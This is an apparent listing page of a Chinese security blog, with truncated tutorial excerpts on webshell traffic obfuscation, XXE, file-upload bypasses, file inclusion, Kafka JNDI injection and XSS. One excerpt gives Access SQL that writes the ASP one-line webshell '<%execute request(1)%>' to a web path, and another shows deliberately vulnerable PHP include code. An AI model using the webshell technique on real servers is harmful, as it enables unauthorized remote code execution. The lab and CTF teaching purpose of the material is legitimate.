-
Windows环境中Domain Controller (域控制器)的搭建,零基础教学详细教程
1.搭建域环境 什么是域? Windows域为网络管理员提供了一种方法来管理大量的pc机,并从一个地方控制它们。一个或多个服务器(称为域控制器)控制域及其上的计算机。 域通常由在同一本地网络上的计算机组成。但是,连……
漏洞空间 2024-08-080 0 -
access数据库导出数据表内容到根目录
创建表a1字段b create table a1(b text) 像表a1字段b里面写入数据 insert into a1 (b) values('<%execute request(1)%>') 把写入的数据导出到D:\web\11.asp SELECT b into [<%execute request(1)%>] i……
漏洞空间 2023-11-240 0 -
冰蝎4.0流量分析及魔改
冰蝎4.0流量分析及魔改 0x00 前言 冰蝎v4.0开放了传输协议的自定义功能,使得流量魔改更为简单方便,本文以jsp脚本类型为例,提供一些冰蝎4流量魔改的方式 0x01传输协议分析 冰蝎4内置了如下几种传输协议,传输协……
漏洞空间 2023-08-190 0 -
XXE漏洞之解决读带特殊字符的文件无回显问题
无回显读取本地敏感文件(Blind OOB XXE) xml.php(保存当根目录如127.0.0.1/xml.php) <?php libxml_disable_entity_loader (false); $xmlfile = file_get_contents('php://input'); $dom = new DOMDocume……
漏洞空间 2023-05-310 0 -
【文件上传绕过】解析漏洞_.htaccess文件解析漏洞
一、实验目的: 1、了解什么是.htaccess文件。 2、通过upload-labs闯关游戏(Pass-04),掌握.htaccess文件解析漏洞技术。 二、工具: cmd命令行 火狐/谷歌浏览器 三、实验环境: 靶 机: windows10虚拟机:192.168……
漏洞空间 2023-05-130 0 -
【文件上传绕过】–二次渲染漏洞
一、实验目的: 1、通过实验学习二次渲染原理的成因。 2、通过搭建漏洞环境,学习绕过技巧。 二、漏洞说明: 1. 二次渲染原理: 1、配合文件包含漏洞: 将一句话木马插入到网站二次处理后的图片中,也就是……
漏洞空间 2023-05-130 0 -
CTF中关于文件包含漏洞
<?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once($_GET['file']); } 场景描述:我们在审计时找到一处文件包含漏洞(使用require_once或include_……
漏洞空间 2023-05-050 0 -
Apache Kafka JNDI注入漏洞(CVE-2023-25194)
搭建漏洞环境(如果启动报错建议更换为JAVA11) kafka_2.11-2.4.0.rar(74.6 MB) 或 http://archive.apache.org/dist/kafka/2.4.0/kafka_2.11-2.4.0.tgz 启动命令 binwindowszookeeper-server-start.bat ……
漏洞空间 2023-03-080 0 -
xss总结介绍
XSS 简介 XSS 攻击指黑客通过特殊的手段往网页中插入了恶意的 JavaScript 脚本,从而在用户浏览网页时,对用户浏览器发起 Cookie 资料窃取、会话劫持、钓鱼欺骗等各攻击。 XSS 跨站脚本攻击本身对 Web 服务器没有……
漏洞空间 2023-03-020 0 -
注册功能设计缺陷-注册漏洞总结
0x01 等保测评项 GBT 22239-2019《信息安全技术 网络安全等级保护基本要求》中,8.1.4安全计算环境—身份鉴别项中要求包括: a)应对登录的用户进行身份标识和鉴别,身份标识具有唯一性,身份鉴别信息具有复杂度要……
漏洞空间 2023-02-150 0
你好,编译好的解压密码是xsssql
评论于 Weblogic远程代码执行CVE-2023-21839/CNVD-2023-04389漏洞复现